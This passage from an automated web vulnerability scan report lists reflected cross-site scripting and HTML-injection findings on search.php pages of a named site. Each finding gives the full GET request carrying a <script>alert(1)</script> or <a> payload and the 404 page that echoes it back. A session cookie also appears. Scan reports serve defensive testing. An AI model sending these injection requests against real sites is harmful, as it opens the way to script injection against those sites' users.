Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating/search.php?keyword=search...58ed4<a>ed9e8c47083&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3319. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cb51a<script>alert(1)</script>db82a91065e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&cb51a<script>alert(1)</script>db82a91065e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&cb51a<script>alert(1)</script>db82a91065e=1 was not found on this server.</p>
...[SNIP]...

2.3320. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c347b<a>98ad835a2d6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2c347b<a>98ad835a2d6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2c347b<a>98ad835a2d6 was not found on this server.</p>
...[SNIP]...

2.3321. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 298bb<script>alert(1)</script>3b1408e8a55 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail298bb<script>alert(1)</script>3b1408e8a55/46/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail298bb<script>alert(1)</script>3b1408e8a55/46/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3322. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d795b<script>alert(1)</script>bba65085939 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46d795b<script>alert(1)</script>bba65085939/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46d795b<script>alert(1)</script>bba65085939/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3323. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b98e2<script>alert(1)</script>8b1e3a8d505 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themesb98e2<script>alert(1)</script>8b1e3a8d505/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themesb98e2<script>alert(1)</script>8b1e3a8d505/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3324. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e5046<script>alert(1)</script>b6dd1d31727 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmose5046<script>alert(1)</script>b6dd1d31727/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmose5046<script>alert(1)</script>b6dd1d31727/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3325. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 143fb<script>alert(1)</script>3cf6416a342 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images143fb<script>alert(1)</script>3cf6416a342/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images143fb<script>alert(1)</script>3cf6416a342/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3326. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1466c<script>alert(1)</script>6617e78e0dc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/search.php1466c<script>alert(1)</script>6617e78e0dc?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/search.php1466c<script>alert(1)</script>6617e78e0dc?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3327. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 10f9f<a>1999a66f3cb was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/kosmos/images/search.php?keyword=search...&Submit3=Search10f9f<a>1999a66f3cb&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/search.php?keyword=search...&Submit3=Search10f9f<a>1999a66f3cb&opt=2 was not found on this server.</p>
...[SNIP]...

2.3328. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 91a17<a>fa9fa046d81 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/kosmos/images/search.php?keyword=search...91a17<a>fa9fa046d81&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/search.php?keyword=search...91a17<a>fa9fa046d81&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3329. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bde9e<script>alert(1)</script>74a3d488b17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&bde9e<script>alert(1)</script>74a3d488b17=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&bde9e<script>alert(1)</script>74a3d488b17=1 was not found on this server.</p>
...[SNIP]...

2.3330. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload eb882<a>704cb26c74 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2eb882<a>704cb26c74 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2eb882<a>704cb26c74 was not found on this server.</p>
...[SNIP]...

2.3331. http://www.resellerbase.com/detail/46/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 241ba<script>alert(1)</script>fe663bfbd7f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail241ba<script>alert(1)</script>fe663bfbd7f/46/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail241ba<script>alert(1)</script>fe663bfbd7f/46/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3332. http://www.resellerbase.com/detail/46/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9c331<script>alert(1)</script>4ad6b6e8b7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/469c331<script>alert(1)</script>4ad6b6e8b7d/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/469c331<script>alert(1)</script>4ad6b6e8b7d/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3333. http://www.resellerbase.com/detail/46/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 36739<script>alert(1)</script>fa27ffc4ef5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes36739<script>alert(1)</script>fa27ffc4ef5/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes36739<script>alert(1)</script>fa27ffc4ef5/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3334. http://www.resellerbase.com/detail/46/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b2914<script>alert(1)</script>45c053f30cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmosb2914<script>alert(1)</script>45c053f30cc/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmosb2914<script>alert(1)</script>45c053f30cc/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3335. http://www.resellerbase.com/detail/46/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d434b<script>alert(1)</script>48baec20360 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/search.phpd434b<script>alert(1)</script>48baec20360?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/search.phpd434b<script>alert(1)</script>48baec20360?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3336. http://www.resellerbase.com/detail/46/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9db63<a>f85b132a3ce was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

